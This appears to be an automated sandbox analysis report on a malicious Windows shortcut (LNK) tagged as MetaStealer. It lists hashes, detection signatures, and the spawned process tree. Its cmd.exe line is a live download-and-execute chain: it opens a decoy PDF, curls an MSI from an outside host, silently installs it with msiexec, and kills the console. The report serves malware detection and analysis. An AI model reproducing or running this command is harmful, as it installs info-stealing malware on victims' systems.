Windows
Analysis Report
thUKanu6GD.lnk
Overview
General Information
Sample name: | thUKanu6GD.lnkrenamed because original name is a hash value |
Original sample name: | 0a9302f5cbdcc6a3d75a904c947c9147.lnk |
Analysis ID: | 1632262 |
MD5: | 0a9302f5cbdcc6a3d75a904c947c9147 |
SHA1: | 7ede6ba3382299dc117f82aced5e51b1a0a01d24 |
SHA256: | e95e5480b291b646297e1bcbd6ab0eb3e4fec53084b714c26271973403e010f7 |
Tags: | lnkMetaStealeruser-abuse_ch |
Infos: | |
Detection
HTMLPhisher, MalLnk
Score: | 92 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected BlockedWebSite
Yara detected malicious lnk
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Enables debug privileges
IP address seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: MsiExec Web Install
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 7080 cmdline:
"C:\Window s\System32 \cmd.exe" /k start m sedge http s://s28.q4 cdn.com/39 2171258/fi les/doc_do wnloads/te st.pdf & c url -sLo C :\Users\us er\AppData \Local\Tem p\bosfortu y.ms http: //559236.n a3.to/gift /setup4391 .msi & msi exec /i C: \Users\use r\AppData\ Local\Temp \bosfortuy .ms /qn | Taskkill / f /im cmd. exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) msedge.exe (PID: 6160 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" https:/ /s28.q4cdn .com/39217 1258/files /doc_downl oads/test. pdf MD5: BF154738460E4AB1D388970E1AB13FAB) msedge.exe (PID: 6720 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=19 52 --field -trial-han dle=2088,i ,116319748 6729131225 2,14733990 9712215785 11,262144 /prefetch: 3 MD5: BF154738460E4AB1D388970E1AB13FAB) curl.exe (PID: 6412 cmdline:
curl -sLo C:\Users\u ser\AppDat a\Local\Te mp\bosfort uy.ms http ://559236. na3.to/gif t/setup439 1.msi MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) msiexec.exe (PID: 6660 cmdline:
msiexec /i C:\Users\ user\AppDa ta\Local\T emp\bosfor tuy.ms /qn MD5: E5DA170027542E25EDE42FC54C929077) taskkill.exe (PID: 6736 cmdline:
Taskkill / f /im cmd. exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
msiexec.exe (PID: 6756 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077)
msedge.exe (PID: 1080 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --flag- switches-b egin --fla g-switches -end --dis able-nacl --do-not-d e-elevate https://s2 8.q4cdn.co m/39217125 8/files/do c_download s/test.pdf MD5: BF154738460E4AB1D388970E1AB13FAB) msedge.exe (PID: 7096 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=22 36 --field -trial-han dle=2036,i ,802488429 4293731055 ,919706280 1569010406 ,262144 /p refetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB) msedge.exe (PID: 2664 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6272 --fie ld-trial-h andle=2036 ,i,8024884 2942937310 55,9197062 8015690104 06,262144 /prefetch: 8 MD5: BF154738460E4AB1D388970E1AB13FAB) msedge.exe (PID: 6956 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6496 --field-t rial-handl e=2036,i,8 0248842942 93731055,9 1970628015 69010406,2 62144 /pre fetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB) identity_helper.exe (PID: 6868 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 104 --fiel d-trial-ha ndle=2036, i,80248842 9429373105 5,91970628 0156901040 6,262144 / prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306) identity_helper.exe (PID: 7132 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.55\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 104 --fiel d-trial-ha ndle=2036, i,80248842 9429373105 5,91970628 0156901040 6,262144 / prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306) msedge.exe (PID: 8400 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7416 --field-t rial-handl e=2036,i,8 0248842942 93731055,9 1970628015 69010406,2 62144 /pre fetch:6 MD5: BF154738460E4AB1D388970E1AB13FAB) msedge.exe (PID: 8516 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=646 0 --field- trial-hand le=2036,i, 8024884294 293731055, 9197062801 569010406, 262144 /pr efetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalLnk | Yara detected malicious lnk | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_BlockedWebSite | Yara detected BlockedWebSite | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Phishing |
---|
Source: | File source: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |